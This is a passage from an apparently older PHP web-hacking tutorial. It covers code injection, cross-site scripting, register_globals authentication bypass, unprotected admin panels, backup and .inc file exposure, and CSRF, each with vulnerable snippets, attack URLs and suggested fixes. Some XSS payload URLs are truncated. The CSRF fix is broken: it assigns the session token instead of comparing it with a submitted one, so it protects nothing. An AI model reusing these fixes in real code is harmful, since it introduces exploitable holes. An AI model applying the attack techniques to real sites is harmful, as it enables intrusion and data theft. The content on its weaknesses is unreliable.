Great,injection done,phpinfo() result printed.No include because slashes are
removed,but we can use system() or another function to execute commands.
9.2 – How to fix
Simple way : Don’t allow “;” and the PHP code will be invalid.
Another way : Don’t allow any special char like “(” or “)” etc.
10) Cross-Site Scripting
– Tips : You can use alot of vectors,can try alot of bypass methods,you cand
find them around the web.
10.0 – Basic example
– Code snippet from test.php
———————————
$name=$_GET['name'];
print $name;
?>
———————————
The input is not filtered,an attacker can inject JavaScript code.Example :
http://127.0.0.1/test.php?name=
A popup with XSS message will be displayed.JavaScript code succesfully executed.
10.1 – Another example
– Code snippet from test.php
——————————————-
$name=addslashes($_GET['name']);
print ‘
‘;
?>
——————————————-
Not an advanced example,only a bit complicated.
http://127.0.0.1/test.php?name=”>
Why this vector?We put ” because we must close the ” from the “name” atribut
of the “table” tag and > to close the “table” tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.
10.2 – Simple example
– Code snippet from modules.php
—————————————————————————
if (isset($name)) {
……………….. etc…………….
} else {
die(“Le fichier modules/”.$name.”/”.$mod_file.”.php est inexistant”);
—————————————————————————
The “name” variable is injectable,input is not filtered,so we can inject
with ease JavaScript code.Example :
http://127.0.0.1/test.php?name=
10.3 – How to fix
Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.
11) Authentication Bypass
– Tips : Look deep in the scripts,look in the admin directories,
maybe are not protected,also look for undefined variables
like “login” or “auth”.
11.0 – Basic example
I will provide a simple example of authentication bypass
via login variable.
– Code snippet from test.php
———————————
if ($logged==true) {
echo ‘Logged in.’; }
else {
print ‘Not logged in.’;
}
?>
———————————
Here we need register_gloabals = on . I will talk about php.ini
settings a bit later in this tutorial.If we set the value of $logged
variable to 1 the if condition will be true and we are logged in.
Example :
http://127.0.0.1/test/php?logged=1
And we are logged in.
11.1 – Via login variable
– Code snippet from login.php
————————————————————————————
if ($login_ok)
{
$_SESSION['loggato'] = true;
echo “
$txt_pass_ok
“;
echo”
$txt_view_entry |
$txt_delete-$txt_edit | $txt_install
“;
}
————————————————————————————
Lets see.If the “login_ok” variable is TRUE ( 1 ) the script set us a SESSION who
tell to the script that we are logged in.So lets set the “login_ok” variable to TRUE.
Example :
http://127.0.0.1/login.php?login_ok=1
Now we are logged in.
11.2 – Unprotected Admin CP
You couln’t belive this but some PHP scrips don’t protect the admin
control panel : no login,no .htaccess,nothing.So we simply we go to
the admin panel directory and we take the control of the website.
Example :
http://127.0.0.1/admin/files.php
We accessed the admin panel with a simple request.
11.3 – How to fix
– Login variable bypass : Use a REAL authentication system,don’t check the
login like that,use SESSION verification.Example :
if($_SESSION['logged']==1) {
echo ‘Logged in’; }
else { echo ‘Not logged in’;
}
– Unprotected Admin CP : Use an authentication system or use .htaccess to
allow access from specific IP’s or .htpasswd to
request an username and a password for admin CP.
Example :
.htaccess :
order deny, allow
deny from all
allow from 127.0.0.1
.htpasswd :
AuthUserFile /the/path/.htpasswd
AuthType Basic
AuthName “Admin CP”
Require valid-user
and /the/path/.htpasswd
sirgod:$apr1$wSt1u…$6yvagxWk.Ai2bD6s6O9iQ.
12) Insecure Permissions
Tips : Look deep into the files,look if the script request to be
logged in to do something,maybe the script don’t request.
Watch out for insecure permissions,maybe you can do admin
things without login.
12.0 – Basic example
We are thinking at a script who let the admin to have a lookup in
the users database through a file placed in /admin directory.That
file is named…hmmm : db_lookup.php.
– Code snippet from admin/db_lookup.php
——————————————–
// Lookup in the database
readfile(‘protected/usersdb.txt’);
?>
——————————————–
Lets think.We cannot access the “protected” directory because
is .htaccess’ed.But look at this file,no logged-in check,nothing.
So if we acces :
http://127.0.0.1/admin/db_lookup.php
We can see the database.Remember,this is only an example created by
me,not a real one,you can find this kind of vulnerabilities in scripts.
12.1 – Read the users/passwords
Oh yeah,some coders are so stupid.They save the usernames and passwords
in text files,UNPROTECTED.A simple example from a script :
http://127.0.0.1/userpwd.txt
And we read the file,the usernames and passwords are there.
12.2 – Download Backups
Some scripts have database backup functions,some are safe,some are not safe.
I will show you a real script example :
– Code snippet from /adminpanel/phpmydump.php
——————————————————————————–
function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {
$con=@mysql_connect(“localhost”,$uid, $pwd) or die(“Could not connect”);
$db=@mysql_select_db($dbname,$con) or die(“Could not select db”);
………………………… etc ……………………..
mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
——————————————————————————–
After a lof of code the function is called.I don’t pasted the entire code
because is huge.I analyzed the script,no login required,no check,nothing.So
if we access the file directly the download of the backup will start.Example :
http://127.0.0.1/adminpanel/phpmydump.php
Now we have the database backup saved in our computer.
12.3 – INC files
Some scripts saves important data in INC files.Usually in INC files is PHP
code containing database configuration.The INC files can be viewed in
browser even they contain PHP code.So a simple request will be enough to
access and read the file.Example :
http://127.0.0.1/inc/mysql.inc
Now we have the database connection details.Look deep in scripts,is more
scripts who saves important data into INC files.
12.4 – How to fix
– Basic example : Check if the admin is logged in,if not,redirect.
- Read the users/passwords : Save the records in a MySQL database
or in a protected file/directory.
– Download Backups : Check if the admin is logged in,if not,redirect.
- INC files : Save the configuration in proper files,like .php or
protect the directory with an .htaccess file.
13) Cross Site Request Forgery
– Tips : Through CSRF you can change the admin password,is not
so inofensive.
Can be used with XSS,redirected from XSS.
13.0 – Basic example
– Code snippet from test.php
—————————————–
check_auth();
if(isset($_GET['news']))
{ unlink(‘files/news’.$news.’.txt’); }
else {
die(‘File not deleted’); }
?>
—————————————–
In this example you will see what is CSRF and how it works.In the “files”
directory are saved the news written by the author.The news are saved like
“news1.txt”,”news2.txt” etc. So the admin can delete the news.The news that
he want to delete will be specified in “news” variable.If he want to delete
the news1.txt the value of “news” will be “1″.We cannot execute this without
admin permissions,look,the script check if we are logged in.
I will show you an example.If we request :
http://127.0.0.1/test.php?news=1
The /news/news1.txt file will be deleted.The script directly delete the file
without any notice.So we can use this to delete a file.All we need is to trick
the admin to click our evil link and the file specified by us in the “news”
variable will be deleted.
13.1 – Simple example
In a way the codes below are included in the index.php file ,I
will not paste all the includes,there are a lot.
– Code snippet from includes/pages/admin.php
——————————————————————–
if ($_GET['act'] == ”) {
include “includes/pages/admin/home.php”;
} else {
include “includes/pages/admin/” . $_GET['act'] . “.php”;
——————————————————————–
Here we can see how the “includes/pages/admin/members.php” is included in
this file.If “act=members” the file below will be included.
– Code snippet from includes/pages/admin/members.php
———————————————————————————————-
if ($_GET['func'] == ‘delete’) {
$del_id = $_GET['id'];
$query2121 = “select ROLE from {$db_prefix}members WHERE ID=’$del_id’”;
$result2121 = mysql_query($query2121) or die(“delete.php – Error in query: $query2121″);
while ($results2121 = mysql_fetch_array($result2121)) {
$their_role = $results2121['ROLE'];
}
if ($their_role != ’1′) {
mysql_query(“DELETE FROM {$db_prefix}members WHERE id=’$del_id’”) or die(mysql_error
());
———————————————————————————————-
We can see here that if “func=delete” will be called by URL,the script will
delete from the database a user with the specified ID ( $id ) without any
confirmation.Example :
http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4
The script check if the admin is logged in so if we trick the admin to click
our evil link the user who have the specified ID in the database will be deleted
without any confirmation.
13.2 – How to fix
– Simple way : Use tokens.At each login,generate a random token and save it
in the session.Request the token in URL to do administrative
actions,if the token missing or is wrong,don’t execute the
action.I will show you only how to to check if the token
is present and is correct.Example :
——————————————————-
check_auth();
if(isset($_GET['news']) && $token=$_SESSION['token'])
{ unlink(‘files/news’.$news.’.txt’); }
else {
die(‘Error.’); }
?>
——————————————————-
